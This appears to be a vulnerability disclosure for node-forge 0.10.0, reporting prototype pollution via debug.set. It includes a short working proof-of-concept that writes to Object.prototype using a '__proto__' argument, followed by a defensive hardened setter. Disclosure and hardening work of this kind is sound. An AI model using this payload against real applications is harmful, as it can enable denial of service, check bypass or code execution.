node-forge

vulnerability prototype pollution
severity 7.3
language javascript
registry npm

✍️ Description

node-forge is subject to a potential prototype pollution issue when the debug.set function is called with unsafe inputs. Although the node-forge maintainers already recognized the prototype pollution risk in util.setPath and removed that function in the latest version, 0.10.0 (see https://github.com/digitalbazaar/forge/blob/master/CHANGELOG.md), another risky entry point in debug.set was overlooked.

🕵️‍♂️ Proof of Concept

// PoC.js
const forge = require('node-forge'); // tested against version 0.10.0
console.log("Before: " + {}.polluted); // undefined
// The category argument is used as a property name on the debug storage object,
// so '__proto__' reaches Object.prototype and 'polluted' is written there.
forge.debug.set('__proto__', 'polluted', 'HACKED');
console.log("After: " + {}.polluted); // HACKED
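For contrast, the following is an added, defender-side example (not node-forge's own code) of how a debug-style setter can be written so that caller-controlled category and name strings can never reach Object.prototype: forbidden keys are rejected and the storage is built from null-prototype objects. The nested category/name storage layout and the function names are assumptions made for the example.

```javascript
'use strict';

// Property names that would let a caller walk up to Object.prototype.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Reject anything that is not a plain, safe string key.
function assertSafeKey(key) {
  if (typeof key !== 'string' || FORBIDDEN_KEYS.has(key)) {
    throw new TypeError('refusing to use unsafe property name: ' + String(key));
  }
}

// Hypothetical hardened replacement for a set(cat, name, data) style API.
function createDebugStore() {
  // Null-prototype objects have no Object.prototype behind them, so even a
  // stray '__proto__' key would become an ordinary own property instead of
  // a setter that rewires the prototype chain.
  const storage = Object.create(null);
  return {
    set(cat, name, data) {
      assertSafeKey(cat);
      assertSafeKey(name);
      if (!Object.prototype.hasOwnProperty.call(storage, cat)) {
        storage[cat] = Object.create(null);
      }
      storage[cat][name] = data;
      return data;
    },
    get(cat, name) {
      const bucket = Object.prototype.hasOwnProperty.call(storage, cat) ? storage[cat] : undefined;
      return bucket && Object.prototype.hasOwnProperty.call(bucket, name) ? bucket[name] : undefined;
    },
  };
}

// True if a fresh object inherits `prop`, i.e. Object.prototype was polluted.
function isPolluted(prop) {
  return ({})[prop] !== undefined;
}

// Replays the PoC inputs against the hardened store and reports what happened.
function demo() {
  const debug = createDebugStore();
  let rejected = false;
  try {
    debug.set('__proto__', 'polluted', 'HACKED'); // same arguments as the PoC
  } catch (e) {
    rejected = e instanceof TypeError;
  }
  debug.set('tls', 'handshake', 'ok'); // ordinary use still works
  return { rejected, polluted: isPolluted('polluted'), stored: debug.get('tls', 'handshake') };
}
```

Running demo() shows the PoC call rejected with a TypeError while `{}.polluted` stays undefined.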

💥 Impact

This vulnerability can pollute Object's prototype, which may lead to many kinds of attacks, such as denial of service, check bypass, or potentially code execution.

References